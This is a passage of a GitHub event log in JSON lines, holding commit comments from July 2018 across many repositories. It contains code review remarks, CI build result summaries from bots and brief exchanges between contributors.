{"id":"8047200274","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29913426,"position":null,"line":null,"path":null,"commit_id":"28d81dd572864173e902fc9f4139da612946aaa2","created_at":"2018-07-31T23:15:16Z","updated_at":"2018-07-31T23:15:16Z","author_association":"CONTRIBUTOR","body":"Forgot to make the brooding fog! Will do that later."}},"created_at":"2018-07-31T23:15:16Z"}
{"id":"8047200799","type":"CommitCommentEvent","actor":{"login":"mvincerx"},"repo":{"name":"clearlinux/clear-linux-documentation"},"payload":{"comment":{"id":29913429,"position":5,"line":9,"path":"source/clear-linux/reference/collaboration/documentation/inline.rst","commit_id":"288a3edd59d80f122ee7c7cdecbb93095178db16","created_at":"2018-07-31T23:15:26Z","updated_at":"2018-07-31T23:15:26Z","author_association":"COLLABORATOR","body":"@intelkevinputnam.  Impressive solution that you found for all of these code block styled directives! Others will benefit from you sharing your knowledge on this. \r\n\r\nJust one minor error.  Can you check the URI for Sphinx Inline Markup at bottom of page, and correct it? When I selected this link in the view option here, I received: \"Sorry this page does not yet exist.\"  Maybe Sphinx changed this recently. \r\n\r\nI found: \r\n[http://www.sphinx-doc.org/en/master/usage/restructuredtext/basics.html?highlight=inline%20markup]\r\n\r\n\r\n "}},"created_at":"2018-07-31T23:15:26Z"}
{"id":"8047204606","type":"CommitCommentEvent","actor":{"login":"styfle"},"repo":{"name":"elliott1130/mma-api"},"payload":{"comment":{"id":29913444,"position":32,"line":32,"path":"Fighter Extract","commit_id":"bacb0563a88fcc779a6f1bbcc43468efc69e2d2d","created_at":"2018-07-31T23:16:37Z","updated_at":"2018-07-31T23:16:37Z","author_association":"NONE","body":"Also, it looks like you are hammering the server pretty hard so you might want to kill any scripts that are still running or else sherdog is going to block you"}},"created_at":"2018-07-31T23:16:37Z"}
{"id":"8047206689","type":"CommitCommentEvent","actor":{"login":"medwards1771"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913458,"position":13,"line":59,"path":"a_first_example/first_example.rb","commit_id":"4831e8970c04871df3413188dc916a9563a9365c","created_at":"2018-07-31T23:17:21Z","updated_at":"2018-07-31T23:17:21Z","author_association":"COLLABORATOR","body":"Can you shed more light on this? What happens when you move #extra_charge_for_rental into #base_charge_for_rental ?"}},"created_at":"2018-07-31T23:17:21Z"}
{"id":"8047206943","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29913461,"position":null,"line":null,"path":null,"commit_id":"895910f39015a4c112f7c77e8b4f5b7bd8705558","created_at":"2018-07-31T23:17:27Z","updated_at":"2018-07-31T23:17:27Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/895910f39015a4c112f7c77e8b4f5b7bd8705558)\n\nBuilt at __20180731 - 23:17:26__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 549s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 564s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 1043s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 909s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 283s | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 292s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1179s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 705s | PASS :white_check_mark: \nmsvc.Release | [console](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//console) | no test results, t: n/a | FAIL :red_circle: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 710s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 399s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 295s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 429s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 298s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 268s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 1100s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/baseuint-x/31//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1184s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-31T23:17:27Z"}
{"id":"8047208166","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29913470,"position":null,"line":null,"path":null,"commit_id":"5b8fc2463b30e642ddf174754306c29c1ac2ae9b","created_at":"2018-07-31T23:17:52Z","updated_at":"2018-07-31T23:17:52Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - i386-Windows-7-VisualStudio-14: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b8fc2463b30e642ddf174754306c29c1ac2ae9b-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b8fc2463b30e642ddf174754306c29c1ac2ae9b-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T23:17:52Z"}
{"id":"8047208722","type":"CommitCommentEvent","actor":{"login":"medwards1771"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913475,"position":4,"line":42,"path":"a_first_example/first_example.rb","commit_id":"5ef459364051bc73061cb3b69ece2bb8482b8816","created_at":"2018-07-31T23:18:04Z","updated_at":"2018-07-31T23:18:04Z","author_association":"COLLABORATOR","body":"Why charge_for_rental > base_charge_for_rental ?"}},"created_at":"2018-07-31T23:18:04Z"}
{"id":"8047209771","type":"CommitCommentEvent","actor":{"login":"shannonbux"},"repo":{"name":"pieh/gatsby"},"payload":{"comment":{"id":29913483,"position":null,"line":null,"path":null,"commit_id":"f0ef46c06937b937c96d057f59f10932c93f10cc","created_at":"2018-07-31T23:18:25Z","updated_at":"2018-07-31T23:18:25Z","author_association":"NONE","body":"looking good, except I think we need both the main_url and url fields so it doesn't break. One of them is what the screenshot plugin uses, and the other one provides the link to the outside site. \r\n\r\n```shell\r\n  # this URL is used to generate a screenshot\r\n  main_url: http://titleofthesite.com/\r\n  \r\n  # this is the URL that is linked from the showcase\r\n  url: http://titleofthesite.co.uk/\r\n```\r\n\r\nhttps://next.gatsbyjs.org/docs/site-showcase-submissions/"}},"created_at":"2018-07-31T23:18:25Z"}
{"id":"8047209789","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29913484,"position":null,"line":null,"path":null,"commit_id":"8e74063abc04904ee9ba3813f702845d91e11c8f","created_at":"2018-07-31T23:18:25Z","updated_at":"2018-07-31T23:18:25Z","author_association":"OWNER","body":"fixes #27 "}},"created_at":"2018-07-31T23:18:25Z"}
{"id":"8047210822","type":"CommitCommentEvent","actor":{"login":"bclothier"},"repo":{"name":"rubberduck-vba/Rubberduck"},"payload":{"comment":{"id":29913485,"position":35,"line":35,"path":"Rubberduck.Parsing/Preprocessing/CompilationArgumentsProvider.cs","commit_id":"ad863d68b0183e6fcb43887917c187c74e980a01","created_at":"2018-07-31T23:18:47Z","updated_at":"2018-07-31T23:18:47Z","author_association":"CONTRIBUTOR","body":"Why not inject `IUiDispatcher` in the ctor from the CW? "}},"created_at":"2018-07-31T23:18:47Z"}
{"id":"8047211089","type":"CommitCommentEvent","actor":{"login":"mark-rushakoff"},"repo":{"name":"influxdata/platform"},"payload":{"comment":{"id":29913486,"position":1,"line":1,"path":"ui/src/side_nav/components/OrgLink.tsx","commit_id":"1042c22469ab19550b3f07c7b3f12143ccfb248f","created_at":"2018-07-31T23:18:52Z","updated_at":"2018-07-31T23:18:52Z","author_association":"MEMBER","body":"@121watts @desa looks like this file was intended to be under the `chronograf` directory, but ended up at /ui by mistake."}},"created_at":"2018-07-31T23:18:52Z"}
{"id":"8047229186","type":"CommitCommentEvent","actor":{"login":"ZabreLight"},"repo":{"name":"Darkonis13/Huber-2.0"},"payload":{"comment":{"id":29913549,"position":47,"line":47,"path":"Huber 2.0.hs","commit_id":"f568bf0fd833c9928df8e54b5e8c8d6a6358b948","created_at":"2018-07-31T23:24:52Z","updated_at":"2018-07-31T23:24:52Z","author_association":"NONE","body":"No entiendo bien esto 🤔. La condicionDeViaje no es del chofer?\r\n```\r\nfilter (/chofer -> (condicionDeViaje chofer) unViaje)  \r\n```  \r\nNo deberia ser asi?"}},"created_at":"2018-07-31T23:24:52Z"}
{"id":"8047230369","type":"CommitCommentEvent","actor":{"login":"medwards1771"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913556,"position":7,"line":95,"path":"a_first_example/first_example.rb","commit_id":"082de3bc11ff2f2bea4b8feefbd22148927af6f3","created_at":"2018-07-31T23:25:17Z","updated_at":"2018-07-31T23:25:17Z","author_association":"COLLABORATOR","body":"Why increment result after total_amount ?"}},"created_at":"2018-07-31T23:25:17Z"}
{"id":"8047231577","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29913561,"position":null,"line":null,"path":null,"commit_id":"03985f783048a4d9d0bbd58b9df157ced198b781","created_at":"2018-07-31T23:25:42Z","updated_at":"2018-07-31T23:25:42Z","author_association":"COLLABORATOR","body":"No, formats = 0x011 on 1024x1024 + 1024x2048 will solve the texture issue, but remove shadows..\r\nEither I'm missing additional formats, or it's not logically the same... "}},"created_at":"2018-07-31T23:25:42Z"}
{"id":"8047234161","type":"CommitCommentEvent","actor":{"login":"ZabreLight"},"repo":{"name":"Darkonis13/Huber-2.0"},"payload":{"comment":{"id":29913568,"position":58,"line":58,"path":"Huber 2.0.hs","commit_id":"f568bf0fd833c9928df8e54b5e8c8d6a6358b948","created_at":"2018-07-31T23:26:34Z","updated_at":"2018-07-31T23:26:34Z","author_association":"NONE","body":"Delegar esta funcion"}},"created_at":"2018-07-31T23:26:34Z"}
{"id":"8047238151","type":"CommitCommentEvent","actor":{"login":"ZabreLight"},"repo":{"name":"Darkonis13/Huber-2.0"},"payload":{"comment":{"id":29913583,"position":62,"line":62,"path":"Huber 2.0.hs","commit_id":"f568bf0fd833c9928df8e54b5e8c8d6a6358b948","created_at":"2018-07-31T23:27:52Z","updated_at":"2018-07-31T23:27:52Z","author_association":"NONE","body":"Tambien se puede hacer.\r\n```\r\n{ viajesHechos = unViaje : (viajesHechos unChofer) }\r\n```\r\n"}},"created_at":"2018-07-31T23:27:52Z"}
{"id":"8047243332","type":"CommitCommentEvent","actor":{"login":"ZabreLight"},"repo":{"name":"Darkonis13/Huber-2.0"},"payload":{"comment":{"id":29913602,"position":null,"line":null,"path":null,"commit_id":"f568bf0fd833c9928df8e54b5e8c8d6a6358b948","created_at":"2018-07-31T23:29:40Z","updated_at":"2018-07-31T23:29:40Z","author_association":"NONE","body":"Muy bueno el parcial, te hice dos comentarios que son mas de estilos que otra cosa 👍 "}},"created_at":"2018-07-31T23:29:40Z"}
{"id":"8047244808","type":"CommitCommentEvent","actor":{"login":"polichtm"},"repo":{"name":"MicrosoftLearning/20533-ImplementingMicrosoftAzureInfrastructureSolutions"},"payload":{"comment":{"id":29913607,"position":null,"line":null,"path":null,"commit_id":"a813220c9c2388877dc1cff8c7faf4c26375bc58","created_at":"2018-07-31T23:30:10Z","updated_at":"2018-07-31T23:30:10Z","author_association":"COLLABORATOR","body":"Hi Tiago\r\nthe letter should match the course version\r\nupdated\r\nrgds\r\nMarcin"}},"created_at":"2018-07-31T23:30:10Z"}
{"id":"8047246347","type":"CommitCommentEvent","actor":{"login":"bryteise"},"repo":{"name":"bryteise/ister"},"payload":{"comment":{"id":29913617,"position":null,"line":null,"path":null,"commit_id":"321a628919a0ea8e5e95c33f8703ac5c81a35d8f","created_at":"2018-07-31T23:30:39Z","updated_at":"2018-07-31T23:30:39Z","author_association":"OWNER","body":"Okay looks good to me."}},"created_at":"2018-07-31T23:30:39Z"}
{"id":"8047246793","type":"CommitCommentEvent","actor":{"login":"mhutch"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29913619,"position":null,"line":null,"path":null,"commit_id":"9ca4d4e927bce4b19d9917c79375a6e74fa56ea7","created_at":"2018-07-31T23:30:49Z","updated_at":"2018-07-31T23:30:49Z","author_association":"MEMBER","body":"The code this replaced was using GetExecutionDependencies though? And it's required for iOS extension projects to work correctly as the containing app needs to be built."}},"created_at":"2018-07-31T23:30:49Z"}
{"id":"8047247332","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29913622,"position":null,"line":null,"path":null,"commit_id":"fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282","created_at":"2018-07-31T23:30:59Z","updated_at":"2018-07-31T23:30:59Z","author_association":"NONE","body":"159433798-Report-correct-Zone-Infiltration-and-Zone-Ventilation-Volume-Flow-Rates (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T23:30:59Z"}
{"id":"8047249089","type":"CommitCommentEvent","actor":{"login":"luhaixun"},"repo":{"name":"kohsuke/sandbox-ant"},"payload":{"comment":{"id":29913632,"position":null,"line":null,"path":null,"commit_id":"8ae38db0ea5837313ab5f39d43a6f73de3bd9000","created_at":"2018-07-31T23:31:36Z","updated_at":"2018-07-31T23:31:36Z","author_association":"NONE","body":"[testing](http://kohsuse.org/)"}},"created_at":"2018-07-31T23:31:36Z"}
{"id":"8047255129","type":"CommitCommentEvent","actor":{"login":"msdundar"},"repo":{"name":"omu/nokul"},"payload":{"comment":{"id":29913660,"position":17,"line":17,"path":"app/jobs/kps_identity_save_job.rb","commit_id":"10efe7675d0569214bec387a6f796d51e767c381","created_at":"2018-07-31T23:33:42Z","updated_at":"2018-07-31T23:33:42Z","author_association":"MEMBER","body":"Bir bakış açısı olarak: böyle yorumlar bırakma ihtiyacı duyuyorsan yazdığın kodda bir şeyler yanlış olabilir. Ne gibi?Yanlış isim seçimleri, yanlış kurgu, metodlara fazla anlam yükleme vs. Kod olması gerektiği gibi ise böyle comment'lere ihtiyaç olmamalı. Ek olarak buraya comment bırakmak zorunda hissettiysen aynı kod `kps_address_save_job`'tada var, orada neden comment yok :)"}},"created_at":"2018-07-31T23:33:42Z"}
{"id":"8047259135","type":"CommitCommentEvent","actor":{"login":"tiagocostapt"},"repo":{"name":"MicrosoftLearning/20533-ImplementingMicrosoftAzureInfrastructureSolutions"},"payload":{"comment":{"id":29913674,"position":null,"line":null,"path":null,"commit_id":"a813220c9c2388877dc1cff8c7faf4c26375bc58","created_at":"2018-07-31T23:35:08Z","updated_at":"2018-07-31T23:35:08Z","author_association":"CONTRIBUTOR","body":"Hi Marcin,\r\n\r\nThat change is ok. but in the change someone deleted the row (84) where you defined the NSG name. We need row 84 in the file in order to run without any issues."}},"created_at":"2018-07-31T23:35:08Z"}
{"id":"8047262203","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29913685,"position":null,"line":null,"path":null,"commit_id":"ecd267172eae6ebb3e47799222a86d0af2441e49","created_at":"2018-07-31T23:36:11Z","updated_at":"2018-07-31T23:36:11Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/ecd267172eae6ebb3e47799222a86d0af2441e49/index.html"}},"created_at":"2018-07-31T23:36:11Z"}
{"id":"8047264391","type":"CommitCommentEvent","actor":{"login":"polichtm"},"repo":{"name":"MicrosoftLearning/20533-ImplementingMicrosoftAzureInfrastructureSolutions"},"payload":{"comment":{"id":29913701,"position":null,"line":null,"path":null,"commit_id":"a813220c9c2388877dc1cff8c7faf4c26375bc58","created_at":"2018-07-31T23:36:57Z","updated_at":"2018-07-31T23:36:57Z","author_association":"COLLABORATOR","body":"Hi Tiago,\r\nI should've been more clear ;)\r\nI updated the file by adding the missing line\r\nrgds\r\nMarcin"}},"created_at":"2018-07-31T23:36:57Z"}
{"id":"8047266693","type":"CommitCommentEvent","actor":{"login":"tiagocostapt"},"repo":{"name":"MicrosoftLearning/20533-ImplementingMicrosoftAzureInfrastructureSolutions"},"payload":{"comment":{"id":29913711,"position":null,"line":null,"path":null,"commit_id":"a813220c9c2388877dc1cff8c7faf4c26375bc58","created_at":"2018-07-31T23:37:45Z","updated_at":"2018-07-31T23:37:45Z","author_association":"CONTRIBUTOR","body":"ha ok! Cool. thanks for the clarification :) "}},"created_at":"2018-07-31T23:37:45Z"}
{"id":"8047267810","type":"CommitCommentEvent","actor":{"login":"cyrus-and"},"repo":{"name":"cyrus-and/chrome-remote-interface"},"payload":{"comment":{"id":29913713,"position":4,"line":30,"path":"package.json","commit_id":"ba0dbab52cdf43a4b4cc62e36184f8c07804b07f","created_at":"2018-07-31T23:38:09Z","updated_at":"2018-07-31T23:38:09Z","author_association":"OWNER","body":"Oops, you're right, fixed in 8b24fcb37e9bf191f803f1e50d29e955cbf5a1a0, thanks for noticing!"}},"created_at":"2018-07-31T23:38:09Z"}
{"id":"8047268203","type":"CommitCommentEvent","actor":{"login":"polichtm"},"repo":{"name":"MicrosoftLearning/20533-ImplementingMicrosoftAzureInfrastructureSolutions"},"payload":{"comment":{"id":29913714,"position":null,"line":null,"path":null,"commit_id":"a813220c9c2388877dc1cff8c7faf4c26375bc58","created_at":"2018-07-31T23:38:17Z","updated_at":"2018-07-31T23:38:17Z","author_association":"COLLABORATOR","body":"Sure – np…\r\n\r\nFrom: Tiago Costa [mailto:notifications@github.com]\r\nSent: Tuesday, July 31, 2018 7:38 PM\r\nTo: MicrosoftLearning/20533-ImplementingMicrosoftAzureInfrastructureSolutions <20533-ImplementingMicrosoftAzureInfrastructureSolutions@noreply.github.com>\r\nCc: polichtm <polichtm@hotmail.com>; Comment <comment@noreply.github.com>\r\nSubject: Re: [MicrosoftLearning/20533-ImplementingMicrosoftAzureInfrastructureSolutions] Update letter D to E (a813220)\r\n\r\n\r\nha ok! Cool. thanks for the clarification :)\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/MicrosoftLearning/20533-ImplementingMicrosoftAzureInfrastructureSolutions/commit/a813220c9c2388877dc1cff8c7faf4c26375bc58#commitcomment-29913711>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AJzvatFHt260nw6nLpqnGEFqQXiuBzDOks5uMOpKgaJpZM4VoqDY>.\r\n"}},"created_at":"2018-07-31T23:38:17Z"}
{"id":"8047273716","type":"CommitCommentEvent","actor":{"login":"alecthomas"},"repo":{"name":"alecthomas/voluptuous"},"payload":{"comment":{"id":29913738,"position":null,"line":null,"path":null,"commit_id":"a66c6c40e12b9498c8a4f5793bb65d83a9f45858","created_at":"2018-07-31T23:40:13Z","updated_at":"2018-07-31T23:40:13Z","author_association":"OWNER","body":"@svisser Would you be interested in helping out as a maintainer of Voluptuous? I don't have much time anymore, and you've been both interested and helpful :)"}},"created_at":"2018-07-31T23:40:13Z"}
{"id":"8047276702","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29913748,"position":null,"line":null,"path":null,"commit_id":"b5fec0ad7cffdf8866702d05cc1778324bafe4a6","created_at":"2018-07-31T23:41:17Z","updated_at":"2018-07-31T23:41:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#ci-305](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#ci-305).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-305-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T23:41:17Z"}
{"id":"8047285463","type":"CommitCommentEvent","actor":{"login":"michaelkirk-signal"},"repo":{"name":"signalapp/Signal-iOS"},"payload":{"comment":{"id":29913761,"position":4,"line":842,"path":"Signal/src/ViewControllers/HomeView/HomeViewController.m","commit_id":"103a8dc579718e7b2830934dbc456fe2b48ceacf","created_at":"2018-07-31T23:44:19Z","updated_at":"2018-07-31T23:44:19Z","author_association":"CONTRIBUTOR","body":"`[self.threadMappings numberOfItemsInSection:0] - 1` is dangerous if the section is empty, but we don't use separator insets anyway.\r\n\r\n"}},"created_at":"2018-07-31T23:44:19Z"}
{"id":"8047286599","type":"CommitCommentEvent","actor":{"login":"michaelkirk-signal"},"repo":{"name":"signalapp/Signal-iOS"},"payload":{"comment":{"id":29913772,"position":3,"line":3501,"path":"Signal/src/ViewControllers/ConversationView/ConversationViewController.m","commit_id":"103a8dc579718e7b2830934dbc456fe2b48ceacf","created_at":"2018-07-31T23:44:44Z","updated_at":"2018-07-31T23:44:44Z","author_association":"CONTRIBUTOR","body":"This was a typo, but since the next statement sets the same value, no harm done."}},"created_at":"2018-07-31T23:44:44Z"}
{"id":"8047287134","type":"CommitCommentEvent","actor":{"login":"michaelkirk-signal"},"repo":{"name":"signalapp/Signal-iOS"},"payload":{"comment":{"id":29913773,"position":null,"line":null,"path":null,"commit_id":"103a8dc579718e7b2830934dbc456fe2b48ceacf","created_at":"2018-07-31T23:44:55Z","updated_at":"2018-07-31T23:44:55Z","author_association":"CONTRIBUTOR","body":"@charlesmchen - I cowboyed this one."}},"created_at":"2018-07-31T23:44:55Z"}
{"id":"8047291218","type":"CommitCommentEvent","actor":{"login":"hitobb"},"repo":{"name":"BitzenyCoreDevelopers/bitzeny"},"payload":{"comment":{"id":29913786,"position":9,"line":70,"path":".travis.yml","commit_id":"59ee773d4d975c5894b5554b5677426822b3832d","created_at":"2018-07-31T23:46:11Z","updated_at":"2018-07-31T23:46:11Z","author_association":"CONTRIBUTOR","body":"This PR is not merged.\r\n\r\nhttps://github.com/BitzenyCoreDevelopers/bitzeny/pull/37"}},"created_at":"2018-07-31T23:46:11Z"}
{"id":"8047297158","type":"CommitCommentEvent","actor":{"login":"ananjaser1211"},"repo":{"name":"ananjaser1211/Helios_7870"},"payload":{"comment":{"id":29913809,"position":4,"line":14,"path":"arch/arm64/configs/j7y17lte_eur_open_defconfig","commit_id":"2c88139cfe1a4af2a5d77e0631c200a2be5966a2","created_at":"2018-07-31T23:48:24Z","updated_at":"2018-07-31T23:48:24Z","author_association":"OWNER","body":"P.S : Typo, should be J7Y17LTE"}},"created_at":"2018-07-31T23:48:24Z"}
{"id":"8047297259","type":"CommitCommentEvent","actor":{"login":"luhaixun"},"repo":{"name":"kohsuke/sandbox-ant"},"payload":{"comment":{"id":29913810,"position":null,"line":null,"path":null,"commit_id":"8ae38db0ea5837313ab5f39d43a6f73de3bd9000","created_at":"2018-07-31T23:48:26Z","updated_at":"2018-07-31T23:48:26Z","author_association":"NONE","body":"[testing](http://kohsuse.org/)"}},"created_at":"2018-07-31T23:48:26Z"}
{"id":"8047297917","type":"CommitCommentEvent","actor":{"login":"sundelirajesh"},"repo":{"name":"tsukasachandesu/video_decrypter"},"payload":{"comment":{"id":29913811,"position":null,"line":null,"path":null,"commit_id":"76e134a4a5d56fd8bbed5b36f580679818a60672","created_at":"2018-07-31T23:48:41Z","updated_at":"2018-07-31T23:48:41Z","author_association":"NONE","body":"i can't understand \"In widevine_decrypter/src/, create a build/ folder and do \"cmake ..\" then \"make\" in a command prompt.\" this part can u plz explain"}},"created_at":"2018-07-31T23:48:41Z"}
{"id":"8047308857","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29913837,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-31T23:52:39Z","updated_at":"2018-07-31T23:52:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T23:52:39Z"}
{"id":"8047311333","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29913844,"position":null,"line":null,"path":null,"commit_id":"27eba341513fb3cf9b68ad88c726db2a36775544","created_at":"2018-07-31T23:53:33Z","updated_at":"2018-07-31T23:53:33Z","author_association":"NONE","body":"158270028_Issue#6422 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2336 of 2336 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage 